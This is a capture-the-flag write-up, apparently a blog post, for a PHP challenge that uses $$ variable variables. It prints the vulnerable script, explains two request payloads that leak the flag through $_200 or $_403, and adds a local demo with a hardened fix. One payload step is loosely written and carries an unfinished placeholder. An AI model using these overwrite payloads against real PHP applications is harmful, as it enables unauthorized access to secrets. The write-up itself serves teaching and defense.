PHP_Code_Challenge-7 - $$ variable overwrite

topic

<?php
include "flag.php";
$_403 = "Access Denied";
$_200 = "Welcome Admin";
if ($_SERVER["REQUEST_METHOD"] != "POST")
    die("BugsBunnyCTF is here :p...");
if ( !isset($_POST["flag"]) )
    die($_403);
foreach ($_GET as $key => $value)
    $$key = $$value;
foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($_403);
echo "This is your flag : ". $flag . "\n";
die($_200);

analysis

if ($_SERVER["REQUEST_METHOD"] != "POST")
    die("BugsBunnyCTF is here :p...");

The request method must be POST.

if ( !isset($_POST["flag"]) )
    die($_403);

The POST body must contain a parameter named flag.

foreach ($_GET as $key => $value)
    $$key = $$value;
foreach ($_POST as $key => $value)
    $$key = $value;

$$ variable overwrite:
the first foreach can assign the value of any existing variable to any variable;
the second foreach can assign any value supplied in the request to any variable.

if ( $_POST["flag"] !== $flag )
    die($_403);
echo "This is your flag : ". $flag . "\n";
die($_200);

If $_POST["flag"] and $flag are not strictly equal (in both value and type), the script outputs $_403;
if they are strictly equal, it outputs $flag and then $_200.

First, try a plain POST request.

Obviously, 1 is not the real flag.
Looking back at the variable overwrite above: foreach ($_POST as $key => $value) $$key = $value;
When the POST body contains only flag with the value 1, $$key = $value becomes $flag = 1, so the existing variable $flag is assigned 1; that is, the real flag is replaced by the POSTed value. Because of the first two if checks, this cannot be avoided.
So the real flag's value has to be copied into another variable before it is overwritten, and that variable then has to be output.
The only output paths are die($_403); and die($_200);, so the idea is to overwrite $_403 or $_200 with the real $flag value before $flag is changed, and have that variable output.
Copying the value of one variable into another variable is only possible in the first foreach.

Knowledge Point

$$ variable overwrite


solution

$_200

Overwrite $_200 with the real flag, then have $_200 output.

$_GET['_200']='flag';
$_POST['flag']=1;

foreach ($_GET as $key => $value)
    $$key = $$value;

This is equivalent to $_200 = $flag, which copies the real flag into $_200.

foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($_403);

$flag is overwritten with 1, which is strictly equal to $_POST['flag'] in both type and value, so the condition $_POST["flag"] !== $flag is not met.

echo "This is your flag : ". $flag . "\n";
die($_200);

die($_200) outputs $_200, which now holds the real flag.

$_403

Overwrite $_403 with the real flag, and craft the request so that $_403 is output.

$_GET['_403']=flag&$_GET["_POST['flag']"]=2
$_POST['flag']=1;

foreach ($_GET as $key => $value)
    $$key = $$value;

This corresponds to $_403 = $flag, which copies the real flag into $_403, as well as $_POST['flag'] = $2; $2 does not exist, so $_POST['flag'] is empty [actual code should be given]

foreach ($_POST as $key => $value)
    $$key = $value;
if ( $_POST["flag"] !== $flag )
    die($_403);

$flag is overwritten with 1, and $_POST['flag'] is not equal to it, so $_POST["flag"] !== $flag is satisfied and $_403 is output.
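
The overwrite and its fix side by side, as an added example that is not part of the original write-up: the challenge's two loops are wrapped in a function so the $_200 case above can be run locally, followed by a hardened check. The function names, the $get/$post parameters standing in for $_GET/$_POST, and the flag string are assumptions made for the example.

```php
<?php
// Added example, not from the original post. $get/$post stand in for
// $_GET/$_POST; the flag string is a constructed placeholder.

// The challenge's two loops, wrapped in a function so the overwrite can be
// observed locally. Variable variables resolve in the function's own scope.
function vulnerable(array $get, array $post): string {
    $flag = "FLAG{constructed-placeholder}";
    $_403 = "Access Denied";
    $_200 = "Welcome Admin";
    foreach ($get as $key => $value)
        $$key = $$value;   // copies any local variable into any other
    foreach ($post as $key => $value)
        $$key = $value;    // sets any local variable to request data
    if ($post["flag"] !== $flag)
        return $_403;
    return $_200;          // status message, by now overwritten
}

// Hardened form: request data stays in its arrays, only the expected key is
// read, and the comparison is constant-time. No request key can name a
// variable, so neither the secret nor the status messages can be reassigned.
function hardened(array $get, array $post): string {
    $flag = "FLAG{constructed-placeholder}";
    $submitted = $post["flag"] ?? null;
    if (!is_string($submitted) || !hash_equals($flag, $submitted))
        return "Access Denied";
    return "Welcome Admin";
}

// Constructed request matching the $_200 walkthrough.
$get  = ["_200" => "flag"];
$post = ["flag" => "1"];

printf("vulnerable: %s\n", vulnerable($get, $post));
printf("hardened:   %s\n", hardened($get, $post));
```

The same rule applies to extract() and parse_str() without a result array: request keys must never be allowed to choose which variable is written.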

Origin www.cnblogs.com/Rain99-/p/12638275.html